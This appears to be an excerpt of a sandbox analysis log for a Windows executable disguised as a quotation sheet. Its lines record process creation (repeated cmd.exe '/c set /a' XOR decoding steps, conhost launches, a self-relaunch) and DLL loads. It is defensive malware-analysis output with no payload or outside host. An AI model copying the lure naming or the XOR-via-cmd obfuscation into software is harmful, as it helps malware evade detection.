Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wintypes.dll Jump to behavior
